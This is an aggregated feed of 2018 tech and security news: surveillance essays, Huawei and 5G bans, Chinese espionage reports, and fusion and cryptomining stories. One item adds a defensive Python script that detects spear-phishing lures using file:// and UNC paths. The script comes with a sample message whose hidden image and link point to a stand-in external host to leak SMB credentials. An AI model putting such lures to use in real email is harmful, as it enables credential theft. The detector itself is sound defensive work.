We don't yet know which subversive ideas and illegal acts of today will become political causes and positive social change tomorrow, but they're around. And they require privacy to germinate. Take away that privacy, and we'll have a much harder time breaking down our inherited moral assumptions.

The second way surveillance hurts our democratic values is that it encourages society to make more things illegal. Consider the things you do -- the different things each of us does -- that portions of society find immoral. Not just recreational drugs and gay sex, but gambling, dancing, public displays of affection. All of us do things that are deemed immoral by some groups, but are not illegal because they don't harm anyone. But it's important that these things can be done out of the disapproving gaze of those who would otherwise rally against such practices.

If there is no privacy, there will be pressure to change. Some people will recognize that their morality isn't necessarily the morality of everyone -- and that that's okay. But others will start demanding legislative change, or using less legal and more violent means, to force others to match their idea of morality.

It's easy to imagine the more conservative (in the small-c sense, not in the sense of the named political party) among us getting enough power to make illegal what they would otherwise be forced to witness. In this way, privacy helps protect the rights of the minority from the tyranny of the majority.

This is how we got Prohibition in the 1920s, and if we had had today's surveillance capabilities in the 1920s, it would have been far more effectively enforced. Recipes for making your own spirits would have been much harder to distribute. Speakeasies would have been impossible to keep secret. The criminal trade in illegal alcohol would also have been more effectively suppressed. There would have been less discussion about the harms of Prohibition, less "what if we didn't?" thinking. Political organizing might have been difficult. In that world, the law might have stuck to this day.

China serves as a cautionary tale. The country has long been a world leader in the ubiquitous surveillance of its citizens, with the goal not of crime prevention but of social control. They are about to further enhance their system, giving every citizen a "social credit" rating. The details are yet unclear, but the general concept is that people will be rated based on their activities, both online and off. Their political comments, their friends and associates, and everything else will be assessed and scored. Those who are conforming, obedient, and apolitical will be given high scores. People without those scores will be denied privileges like access to certain schools and foreign travel. If the program is half as far-reaching as early reports indicate, the subsequent pressure to conform will be enormous. This social surveillance system is precisely the sort of surveillance designed to maintain the status quo.

For social norms to change, people need to deviate from these inherited norms. People need the space to try alternate ways of living without risking arrest or social ostracization. People need to be able to read critiques of those norms without anyone's knowledge, discuss them without their opinions being recorded, and write about their experiences without their names attached to their words. People need to be able to do things that others find distasteful, or even immoral. The minority needs protection from the tyranny of the majority.

Privacy makes all of this possible. Privacy encourages social progress by giving the few room to experiment free from the watchful eye of the many. Even if you are not personally chilled by ubiquitous surveillance, the society you live in is, and the personal costs are unequivocal.

This essay originally appeared in McSweeney's issue #54: "The End of Trust." It was reprinted on

What’s the Next Big Thing in Tech? It’s Up To Us

If it feels like new technologies go from flights of fancy to billion-dollar businesses faster than ever, that's because they do. From a column (which may be paywalled): Consider that Uber, founded in 2009, started allowing drivers to sign up with their own cars in 2013. Five short years later, the company operates in more than 70 countries and competes with dozens of copycats. It's considering going public in 2019 at a potential valuation of $120 billion, which would make it the biggest IPO in U.S. history by far. When novel software can go from hackathon to app store overnight, and even complex hardware can hit manufacturing lines in months, the determining factor of success is us -- as consumers, workers, even regulators. If the pitch works and we bite, a technology can quickly transform our social norms. At the WSJ Tech D. Live conference in Laguna Beach, Calif., this week, what became apparent across dozens of talks, classes and informal chats is that, when almost anything we can dream up is possible, the most important factors in the spread of technology are now cultural. Not every new development in technology leads to an Uber-scale industry, of course, but here are five trends that highlight this shift. China's success in addressing tech needs at home has made it a global leader. As Google struggles with walkouts and morale at Facebook craters, many workers at Chinese startups are so committed to their work that they've adopted a grueling schedule called 996 -- 9 a.m. to 9 p.m., six days a week. In 2018, China will eclipse the U.S. in spending on R&D, projects the National Science Board. Patrick Collison, chief executive of Stripe, talked about how much of Asia is leapfrogging the West because there isn't tons of old infrastructure -- like gas-guzzling car fleets -- to update, so the latest technology catches on right away. In China, this is especially true in payments, which are now overwhelmingly made through mobile phones. 
The world's leading face-recognition and drone companies are in China, and its electric-vehicle, autonomous-driving and AI companies are already on par with their U.S. counterparts, said Kai-Fu Lee, former president of Google China and current head of technology-investment firm Sinovation Ventures. China's mission rests on techies dedicated to building the future for its billion-plus population -- achieving global technological dominance en route.

Read more of this story at Slashdot.

A Chinese Startup May Have Cracked Solid-State Batteries

hackingbear writes: According to Chinese media, Qing Tao Energy Development Co, a startup out of the technical Tsinghua University, has deployed a solid-state battery production line in Kunshan, East China. Reports claim the line has a capacity of 100MWh per year -- which is planned to increase to 700MWh by 2020 -- and that the company has achieved an energy density of more than 400Wh/kg, compared to new generation lithium-ion batteries that boast a capacity of around 250-300Wh/kg. Details beyond this are sparse. The headline news here, if accurate, would be that the company has managed to put solid-state batteries into high volume production, but it's not clear how Qing Tao Energy Development has achieved this, nor what price points are involved. Furthermore, while a capacity of 100MWh is not to be sneezed at, it still only equates to fewer than 2,000 long-range EVs per year. Nonetheless, the news demonstrates that progress is happening in the solid-state battery arena. We might not feasibly yet be at high volume production, but we're on our way.

Read more of this story at Slashdot.

Security Affairs: US Government is asking allies to ban Huawei equipment

US Government is inviting its allies to exclude Huawei equipment from critical infrastructure and 5G architectures, reports the Wall Street Journal

The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the national security risks of adopting Huawei equipment and is urging internet providers and telecom operators in allied countries to ban Huawei.

Chinese equipment is widely deployed in many allied countries, including Germany, Italy, and Japan.

Many countries are preparing to build 5G infrastructure, but their governments' approaches differ completely. Italian politicians seem to ignore the importance of 5G infrastructure for the country's growth and its potential effects on national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender because they are worried about a potential compromise of national security.

According to the Wall Street Journal, the US government is planning to offer financial aid for telecoms development to countries that do not use Chinese-made equipment.

Germany is not the first country to ban Chinese firms from the 5G auction, Australia and the US already announced the same decision.

Huawei always denied links to the Chinese intelligence services.

US officials are concerned about the use of Chinese telecom equipment in countries that host US military bases, including Germany, Italy, and Japan.

Pierluigi Paganini

(Security Affairs – intelligence, cyber espionage)

The post US Government is asking allies to ban Huawei equipment appeared first on Security Affairs.

US Asks Foreign Allies To Avoid Huawei

The US government is reportedly trying to persuade its foreign allies' wireless and internet providers to avoid Huawei equipment. From a report: Officials have spoken to their counterparts and telecom bosses in Germany, Italy, Japan and other friendly countries where the Chinese company's equipment is already in use, the Wall Street Journal reported, citing unnamed sources. The US is reportedly particularly worried about the use of Huawei equipment in countries with American military bases, since most nonsensitive communication travels via commercial networks, and it's concerned about Chinese meddling.

Read more of this story at Slashdot.

Beijing To Judge Every Resident Based on Behavior by End of 2020

China's plan to judge each of its 1.3 billion people based on their social behavior is moving a step closer to reality, with Beijing set to adopt a lifelong points program by 2021 that assigns personalized ratings for each resident. From a report: The capital city will pool data from several departments to reward and punish some 22 million citizens based on their actions and reputations by the end of 2020, according to a plan posted on the Beijing municipal government's website this week. Those with better so-called social credit will get "green channel" benefits while those who violate laws will find life more difficult. The Beijing project will improve blacklist systems so that those deemed untrustworthy will be "unable to move even a single step," according to the government's plan. Xinhua reported on the proposal Tuesday, while the report posted on the municipal government's website is dated July 18.

Read more of this story at Slashdot.

Forex Analysis And Chartbook: Tech Selloff Resumes, Dollar Dips Again, as Yields Hit 2-Month Low

Monday Market Snapshot

Asset          Current Value   Daily Change
S&P 500        2,697           -1.62%
DAX 30         11,244          -0.85%
WTI Crude Oil  56.76           -0.12%
GOLD           1,224           0.21%
Bitcoin        4,989           -10.26%
EUR/USD        1.1452          0.32%

While all eyes were on the cryptocurrency segment today, as the major coins continue to fall sharply, traditional financial markets have also been very active […]

The post Forex Analysis And Chartbook: Tech Selloff Resumes, Dollar Dips Again, as Yields Hit 2-Month Low appeared first on Hacked: Hacking Finance.

5 Things To Watch Next Week + ChartBook

Brexit Saga Nearing Its End?

GBP/USD, 4-Hour Chart Analysis

The Great British Pound had its most volatile week since the Brexit referendum, with still the same issue causing turmoil years after the initial shocking decision. For now, nothing is certain about the outcome of the saga, even with several deadlines quickly approaching. After the exodus […]

The post 5 Things To Watch Next Week + ChartBook appeared first on Hacked: Hacking Finance.

China builds an ‘artificial sun’ that is 6 times hotter than our ‘natural sun’

China builds an ‘artificial sun’ that can hit temperatures of 100 million degrees Celsius

Last month, we reported that a team of scientists at the Chengdu Aerospace Science and Technology Microelectronics System Research Institute Co (CASC) in China had developed an "artificial moon", 8 times brighter than the natural moon, to replace streetlights in the country by 2020.

Now, a team at the Hefei Institutes of Physical Science of the Chinese Academy of Sciences has announced that its Experimental Advanced Superconducting Tokamak (EAST) reactor has reached a new record plasma temperature of 100 million degrees Celsius.

EAST has been dubbed an "artificial sun" because it replicates the process the sun uses to produce energy. It operates at 100 million degrees Celsius, more than six times hotter than the sun's core, which is at around 15 million degrees Celsius. The state-of-the-art reactor is designed to turn hydrogen into cost-effective green energy.

“Scientists carried out the experiments on plasma equilibrium and instability, confinement and transport, plasma-wall interaction and energetic particle physics to demonstrate the long time scale steady-state H-mode operation with good control of impurity, core/edge MHD stability, heat exhaust using an ITER-like tungsten divertor,” the institute wrote in its announcement article.

Our sun generates light and heat by nuclear fusion, a process in which two hydrogen nuclei combine and release a huge amount of energy. Because the two positively charged nuclei repel each other, enormous temperatures are needed to overcome that repulsion; scientists put the temperature at which fusion can occur at about 100 million degrees Celsius.

Hence, reaching 100 million degrees Celsius is an important step, as this is roughly the minimum temperature needed to create conditions suitable for nuclear fusion on Earth.

The aim of EAST is to understand the fusion process before a full reactor is built and fusion is used as an alternative source of energy on Earth. The process promises more power than fission and is far safer, producing almost no dangerous nuclear waste.

“Nuclear fusion is arguably the best way for human beings to get energy. In terms of raw materials, deuterium and tritium required for nuclear fusion are almost inexhaustible in the ocean. Besides, nuclear fusion does not produce any radioactive waste, so it is extremely environmentally friendly,” said the researchers in a recently issued statement.

Matthew Hole, an Associate professor from the Australian National University told ABC News that the achievement was an important step for nuclear fusion science and could be the solution to global energy problems.

“It’s certainly a significant step for China’s nuclear fusion program and an important development for the whole world,” Dr. Hole said.

“The benefit is simple in that it is very large-scale baseload [continuous] energy production, with zero greenhouse gas emissions and no long-life radioactive waste.

The research group in charge of EAST says it accomplished this milestone through the use of several new methods of heating and controlling the plasma; however, it was able to maintain the record temperature for only around 10 seconds.

Dr. Hole also adds that fusion reactors avoid the risks associated with current nuclear fission reactors, whose technology can be diverted to weapons and which are susceptible to meltdowns with catastrophic outcomes.

China designed and built the artificial sun in 2006. EAST is 11 meters tall, 8 meters in diameter and weighs 400 tons. According to China Daily, China is the first country to design and develop such equipment on its own.

The post China builds an ‘artificial sun’ that is 6 times hotter than our ‘natural sun’ appeared first on TechWorm.

Shoddy security of popular smartwatch lets hackers access your child’s location

By Waqas

Smartwatches are generally considered safe to keep track of your kids when they are outside the home. However, there is a scary new revelation about this seemingly reliable gadget that it is possible to hack GPS-enabled smartwatches. Probably a majority of children wear smartwatches these days, and the fact that one of the most popular […]

Chinese Telecoms Giant ZTE is Helping Venezuela Build a System That Monitors Citizen Behavior Through a New Identification Card

The "fatherland card," already used by the government to track voting, worries many in Venezuela and beyond. From a report: In April 2008, former Venezuelan President Hugo Chavez dispatched Justice Ministry officials to visit counterparts in the Chinese technology hub of Shenzhen. Their mission, according to a member of the Venezuela delegation, was to learn the workings of China's national identity card program. Chavez, a decade into his self-styled socialist revolution, wanted help to provide ID credentials to the millions of Venezuelans who still lacked basic documentation needed for tasks like voting or opening a bank account. Once in Shenzhen, though, the Venezuelans realized a card could do far more than just identify the recipient. There, at the headquarters of Chinese telecom giant ZTE Corp, they learned how China, using smart cards, was developing a system that would help Beijing track social, political and economic behavior. Using vast databases to store information gathered with the card's use, a government could monitor everything from a citizen's personal finances to medical history and voting activity. "What we saw in China changed everything," said the member of the Venezuelan delegation, technical advisor Anthony Daquin. His initial amazement, he said, gradually turned to fear that such a system could lead to abuses of privacy by Venezuela's government. "They were looking to have citizen control." The following year, when he raised concerns with Venezuelan officials, Daquin told Reuters, he was detained, beaten and extorted by intelligence agents. They knocked several teeth out with a handgun and accused him of treasonous behavior, Daquin said, prompting him to flee the country. Government spokespeople had no comment on Daquin's account. The project languished. But 10 years after the Shenzhen trip, Venezuela is rolling out a new, smart-card ID known as the "carnet de la patria," or "fatherland card." 
The ID transmits data about cardholders to computer servers. The card is increasingly linked by the government to subsidized food, health and other social programs most Venezuelans rely on to survive.

Read more of this story at Slashdot.

Chinese TEMP.Periscope cyberespionage group was using TTPs associated with Russian APTs

Chinese TEMP.Periscope cyberespionage group targeted a UK-based engineering company using TTPs associated with Russia-linked APT groups.

Attribution of cyber attacks is always hard; in many cases attackers plant false flags to disguise their identity.

Chinese hackers have targeted a UK-based engineering company using techniques and artifacts attributed to the Russia-linked APT groups Dragonfly and APT28, according to security researchers.

Threat intelligence experts from Recorded Future discovered that the Chinese threat actor TEMP.Periscope was using TTPs associated with Russian APT groups in an attempt to complicate attribution. The same campaign that targeted the UK-based engineering company also hit a freelance journalist based in Cambodia, and the attackers used command and control infrastructure previously used by TEMP.Periscope.

“Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development.” reads the analysis published by Recorded Future.

“We believe both attacks used the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope’s interest in the U.K. engineering company they targeted dates back to attempted intrusions in May 2017.”

The attackers used the domain scsnewstoday[.]com as C2, the same domain used in a recent TEMP.Periscope campaign targeting the Cambodian government.

The spear-phishing messages were sent by using the popular Chinese email client, Foxmail.

It is interesting to note that the attackers employed a unique technique used in the past by the Dragonfly APT group in attacks aimed at critical infrastructure: a “file://” path in the spearphish that calls out to a malicious C2 in order to steal SMB credentials.

“A unique technique documented as a Dragonfly TTP in targeting critical infrastructure was used in the attack. The technique attempts to acquire SMB credentials using a “file://” path in the spearphish calling out to a malicious C2,” continues the analysis.

“The attack probably made use of a version of the open source tool Responder as an NBT-NS poisoner. APT28 used Responder in attacks against travelers staying at hotels in 2017.”
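One defensive check that follows from this technique, as an added example (not code from Recorded Future, Security Affairs or any tool named above): scan a message body for “file://” URLs or UNC paths pointing outside the organisation, since that is what makes a Windows client open an outbound SMB connection and offer NTLM credentials to whatever host answers. The internal DNS suffix, the address ranges, and the sample message are assumptions constructed for illustration.

```python
"""Flag spear-phishing lures that reference an external SMB host.

Added example; not code from Recorded Future or Security Affairs. A file://
URL or a UNC path that resolves to an attacker-controlled host makes a
Windows client connect outbound on TCP/445 and, by default, authenticate
with NTLM. The suffix, ranges and message below are constructed.
"""
import ipaddress
import re
from html.parser import HTMLParser

# Assumption: the organisation's file servers live under this DNS suffix or
# inside these ranges; any other file:// or UNC target is an outbound lure.
INTERNAL_SUFFIXES = (".corp.example",)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

# Matches file://host/..., file:\\host\... and bare UNC paths \\host\...
FILE_REF_RE = re.compile(
    r"(?:file:(?://|\\\\)|\\\\)([A-Za-z0-9.\-\[\]:]+)(?:[/\\][^\s\"'<>]*)?",
    re.IGNORECASE,
)
# Attributes a mail client may fetch without a click versus only on a click.
AUTO_ATTRS = {"src", "background", "data", "poster"}
CLICK_ATTRS = {"href", "action"}


def is_internal_host(host: str) -> bool:
    """True for RFC 1918/loopback/link-local addresses, single-label names
    (resolved on the LAN, where LLMNR/NBT-NS poisoning is the risk instead)
    and names under the organisation's own DNS suffix."""
    host = host.strip("[]").lower()
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "." not in host or host.endswith(INTERNAL_SUFFIXES)
    return any(addr in net for net in INTERNAL_NETS)


class _RefCollector(HTMLParser):
    """Collect attribute values that trigger a fetch, tagged by how."""

    def __init__(self):
        super().__init__()
        self.refs = []  # list of (trigger, attribute value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            if name.lower() in AUTO_ATTRS:
                self.refs.append(("auto", value))
            elif name.lower() in CLICK_ATTRS:
                self.refs.append(("click", value))


def find_smb_lures(body: str, is_html: bool = True):
    """Return [(trigger, host, reference)] for each external file:// or UNC
    reference. 'auto' means a client that renders remote content connects
    without user action; 'click' means the user has to open the link."""
    sources = []
    if is_html:
        collector = _RefCollector()
        collector.feed(body)
        sources.extend(collector.refs)
    # Also scan the raw text so a path pasted into the body is not missed.
    sources.append(("click", body))

    findings, seen = [], set()
    for trigger, text in sources:
        for match in FILE_REF_RE.finditer(text):
            host, ref = match.group(1), match.group(0)
            if is_internal_host(host) or ref in seen:
                continue
            seen.add(ref)
            findings.append((trigger, host, ref))
    return findings


# Constructed spear-phish body; 203.0.113.0/24 is documentation address space.
SAMPLE_SPEARPHISH = """<html><body>
<p>Please review the attached tender for the hull design package.</p>
<img src="file://203.0.113.10/share/sig.png" width="1" height="1">
<p><a href="\\\\203.0.113.10\\docs\\Tender.docx">Open tender document</a></p>
<p><a href="https://intranet.corp.example/docs">Intranet</a></p>
<img src="file://fs01.corp.example/public/logo.png">
</body></html>"""

if __name__ == "__main__":
    for trigger, host, ref in find_smb_lures(SAMPLE_SPEARPHISH):
        print(f"{trigger:5} {host:15} {ref}")
```

The same logic can run over a mail gateway's quarantine or over proxy logs; pairing it with an egress block on TCP/445 removes the credential leak even when a lure gets through.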

The same UK engineering company was already targeted by TEMP.Periscope in May 2017; months later the hackers also hit US engineering and academic entities.

“Recorded Future expects TEMP.Periscope to continue to target organisations in the high-tech defence and engineering sectors,” concludes the report.

“The Chinese strategic requirement to develop advanced technology, particularly in marine engineering, remains an intense focus as China looks to dominate the South China Sea territory.”


“We believe TEMP.Periscope will continue to use commodity malware because it is still broadly successful and relatively low cost for them to use. They will continue to observe ‘trending’ vulnerabilities to exploit and use techniques that have been publicly reported in order to gain access to victim networks.”

“We have to understand and tackle the underlying economic ecosystem that enables, funds and supports criminal activity on a global scale to stem the tide and better protect ourselves. By better understanding the systems that support cyber-crime, the security community can better understand how to disrupt and stop them.”

Pierluigi Paganini

(Security Affairs – TEMP.Periscope, hacking)

The post Chinese TEMP.Periscope cyberespionage group was using TTPs associated with Russian APTs appeared first on Security Affairs.

Senior German officials want to exclude Chinese firms from building 5G infrastructure

Senior German officials are pressuring the government to exclude Chinese firms from building the country’s 5G infrastructure.

Many countries are going to build 5G infrastructure, but governments are taking completely different approaches. Italian politicians seem to completely ignore the importance of 5G infrastructure for the growth of the country and its potential effects on national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender because they are worried about a potential compromise of national security.

Germany is not the first country to ban Chinese firms from the 5G auction; Australia and the US have already announced the same decision.

“There is serious concern. If it were up to me we would do what the Australians are doing,” one senior German official involved in the internal 5G debate in Berlin told Reuters.

Officials in the German foreign and interior ministries were informed by Australian and American peers of the risks of using Chinese suppliers like Huawei in 5G infrastructure.

A heated debate is growing in the country and experts fear that this could cause a delay in the implementation of the infrastructure that is planned for 2019.


Officials fear possible interference by Chinese intelligence, which is also permitted under China’s National Intelligence Law, approved in 2017, which states that Chinese “organisations and citizens shall, in accordance with the law, support, cooperate with, and collaborate in national intelligence work”.

Experts believe that companies like Huawei could support the Chinese government in cyber espionage activities or that Chinese intelligence may be able to compromise Huawei’s equipment.

“Cyber security has always been our top priority and we have a proven track record of providing secure products and solutions for our customers in Germany and around the world,” a Huawei spokesman told Reuters.

Huawei believes that the decision to ban it from 5G auctions is “politically motivated” and based on a “mistaken and narrow understanding” of Chinese law.

“Last week, after The Australian newspaper published a story saying Huawei staffers had been used by Chinese intelligence to obtain access codes to infiltrate a foreign network, the company denied that it had ever “provided or been asked to provide customer information for any government or organisation”,” Reuters added.

“Following Australia’s decision to exclude the Chinese from their 5G network, there is huge angst at Huawei,” said a senior industry official who requested anonymity because of the sensitivity of the issue.

“They fear a domino effect. If it stops with Australia it is not such a big deal. But if it continues it’s serious. A 5G setback in Germany could ripple across Europe.”

Pierluigi Paganini

(Security Affairs – 5G infrastructure, China)

The post Senior German officials want to exclude Chinese firms from building 5G infrastructure appeared first on Security Affairs.

China’s Fusion Reactor Reaches 100 Million Degrees Celsius

hackingbear shares a report from the Australian Broadcasting Corporation: The team of scientists from China's Institute of Plasma Physics announced this week that plasma in their Experimental Advanced Superconducting Tokamak (EAST) -- dubbed the 'artificial sun' -- reached a whopping 100 million degrees Celsius which is six times hotter than the core of the Sun. This temperature is the minimum required to maintain a fusion reaction that produces more power than it takes to run. The Chinese research team said they were able to achieve the record temperature through the use of various new techniques in heating and controlling the plasma, but could only maintain the state for around 10 seconds. The latest breakthrough provided experimental evidence that reaching the 100 million degrees Celsius mark is possible, according to China's Institute of Plasma Physics. "While the U.S. is putting new restrictions on nuclear technology exports to China, inventions and findings of EAST will be important contributions to the development of the International Thermonuclear Experimental Reactor (ITER)," writes Slashdot reader hackingbear. The reactor is currently being built in southern France with collaboration from 35 nations. According to the Australian Broadcasting Corporation, it is expected to be "the first device to consistently produce net energy, producing 500 megawatts of clean and sustainable power."

Read more of this story at Slashdot.

Nigerian ISP Hijacks Google Traffic, Sends It Through Russia and China

A small Nigerian Internet service provider (ISP) hijacked traffic meant for Google data centers on Monday, re-routing local traffic through China and Russia and making some hosted services temporarily unavailable for users.

The post Nigerian ISP Hijacks Google Traffic, Sends It Through Russia and China appeared first on The Security Ledger.


Headmaster caught mining cryptocurrency at school; gets fired

By Uzair Amir

A Chinese school headmaster Lei Hua was caught mining cryptocurrency using the school’s electricity. As a result, he had to lose his job. It happened at Puman Middle School in Hunan province of China. Initially, teachers complained about the loud noise that continued day and night while an increase in the school’s electricity consumption was also reported […]


Chinese headmaster fired after setting up his own secret cryptomining rig at school

A Chinese headmaster has lost his job after it was discovered he was stealing the school’s electricity to power a secret cryptocurrency-mining rig.

As the South China Morning Post reports, Lei Hua, the head teacher of a school in the central province of Hunan, built a stack of eight servers that run day and night, mining for the Ethereum cryptocurrency.

According to the report, Lei paid 10,000 yuan (approximately US $1400) in June 2017 to buy his first cryptomining machine, which he set up at his home.

However, the headmaster soon discovered that his activities were consuming a significant amount of electricity – 21 kWh per day – and in an attempt to save himself money, Lei is said to have relocated the machine to his school’s computer room, where it was soon joined by more mining machines.

Astonishingly, the school’s deputy headmaster is also said to have joined the scheme, buying a mining machine with Lei’s help that also gobbled up the school’s power supply.

In all, a total of eight cryptomining machines were installed in the school between mid-2017 and the summer of 2018.

After one year, an electricity bill of 14,700 yuan (US $2120) had been racked up, causing a school employee to raise a concern with the headmaster about why the school might be using so much electricity. Lei, however, dismissed the question and blamed the increased bill on the cost of air conditioning and heaters.

It was only when fellow teachers at the school became suspicious of the continual sound of whirring computers that the rig of eight cryptomining devices was identified.

Both Lei and his deputy headmaster have had their cryptocurrency earnings seized by the authorities, although it is not known how much they might have earnt through their clandestine operation. Lei was dismissed last month, according to reports, and his deputy given an official warning.

It’s an amusing story, but there are genuine concerns for other organisations here.

The cryptocurrency ‘gold rush’ has encouraged many people to break rules and even the law, motivated by the dream of earning themselves a fortune.

We’ve often seen this exhibited through the use of cryptomining malware impacting internet-connected PCs, but it’s equally an issue inside companies and organisations where staff might be tempted to sneak in a few computers to mine away under a desk, or in a seldom-visited server room.

Perhaps the most notorious example of this was the arrest earlier this year of a group of Russian nuclear scientists, who hijacked their own supercomputer at a top-secret nuclear weapon facility to allegedly mine for cryptocurrencies.

With the huge amount of energy and great computational power required to mine cryptocurrencies, having a supercomputer at your disposal gives you something of an advantage. Especially when someone else is paying for the electricity…

Organisations need to keep a close eye on what is happening on their network, and whether someone might have sneaked in additional computing equipment for their own purposes without permission.

After all, if you don’t have tight control over what is running in your organisation, you might have more problems than just a high electricity bill.

US government accuses Chinese hackers of stealing jet engine IP

The Justice Department has charged ten Chinese nationals -- two of whom are intelligence officers -- with hacking into and stealing intellectual property from a pair of unnamed US and French companies from January 2015 to at least May 2015. The hackers were after a type of turbofan (a portmanteau of turbine and fan), a large commercial airline engine, either to avoid its development costs or to avoid having to buy it. According to the complaint by the Department of Justice, a Chinese aerospace manufacturer was simultaneously working on a comparable engine. The hack affected unnamed aerospace companies located in Arizona, Massachusetts and Oregon.

Via: ZD Net

Source: US Department of Justice

US intelligence chief says ‘no evidence’ of Chinese spy chips

Dan Coats, the US director of national intelligence, said there's "no evidence" that Chinese spies tampered with servers bought by up to 30 companies, including the likes of Apple and a telecom provider, as Bloomberg reported earlier this month. However, he told Cyberscoop that "we're not taking anything for granted. We haven't seen anything, but we're always watching."

Via: The Verge

Source: Cyberscoop

Apple CEO calls on Bloomberg to retract China surveillance report

Earlier this month, Bloomberg reported that San Jose-based server company Super Micro installed surveillance micro-chips in the Chinese data center hardware of up to 30 companies, including Amazon and Apple. These chips were supposedly used to steal intellectual property. However, all companies that were named in the initial report have denied Bloomberg's claims. Now, Apple CEO Tim Cook is calling on the well-reputed publication to retract its story altogether, according to BuzzFeed News.

Source: BuzzFeed News

Stolen Apple IDs reportedly used for mobile payment theft in China

Users of two major mobile payment services in China -- Alipay and WeChat Pay -- have reported unauthorized Apple App Store spending in recent days, with some losing nearly $300 through fraudulent transactions. The companies say that stolen Apple IDs are to blame, the Wall Street Journal reports, and Alipay has asked Apple to investigate. In the meantime, Alipay is telling its customers to minimize potential losses by reducing how much money can be used from their accounts without a password.

Via: 9to5Mac

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally


FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."

Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX).

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.

Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).

Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

